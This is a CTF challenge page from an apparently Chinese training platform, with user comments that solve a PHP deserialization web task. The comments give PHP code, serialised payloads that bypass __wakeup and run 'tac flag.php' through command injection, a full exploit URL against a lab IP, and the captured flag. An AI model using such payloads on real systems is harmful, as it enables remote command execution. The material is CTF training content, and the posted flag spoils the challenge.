安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 2049
提  示:
描  述:
flag{}
评论
不会编程的崽 1年前

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>

回复 0

不会编程的崽 1年前

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

c41vin 2年前

0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6

回复 0

wxy1343 2年前

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

回复 0

wxy1343 2年前

flag{Unser1alize_and_2CE_Add}

回复 0

yuanyipaceandlove 2年前

class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;

回复 0

15683956189 2年前

特别要注意下url编码的问题

回复 0

泡椒控卫 2年前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 0

追风亚索 2年前

flag{Unser1alize_and_2CE_Add},flag是不是没变

回复 0

笨笨笨蛋 2年前

只要序列化的中的成员数大于实际成员数,即可绕过,虽然不是很懂,但是对这个有一个印象了 dirsearch很实用哦~

回复 2

WriteUp

image
小赵同学

3 金币

评分(3)

解题动态

网络安全亮 攻破了该题 18小时前
souljian03 攻破了该题 2天前
dwx1583 攻破了该题 3天前
hackerbugku 攻破了该题 3天前
zengzhijing 攻破了该题 3天前
王者荣耀 攻破了该题 5天前
maomaoht 攻破了该题 7天前
ahsjezyt 攻破了该题 9天前
千机www 攻破了该题 9天前
MUJOO 攻破了该题 9天前
不吃鸭蛋 攻破了该题 10天前
Da1ly_1upup 攻破了该题 12天前
lzq2000 攻破了该题 12天前
ETERNALBLUE 攻破了该题 13天前
bugkuctfmike6 攻破了该题 15天前
124要留就要77 攻破了该题 15天前
smtall 攻破了该题 19天前
LostDawn 攻破了该题 19天前
yy56 攻破了该题 21天前
ZZZZZZYx 攻破了该题 23天前
问题反馈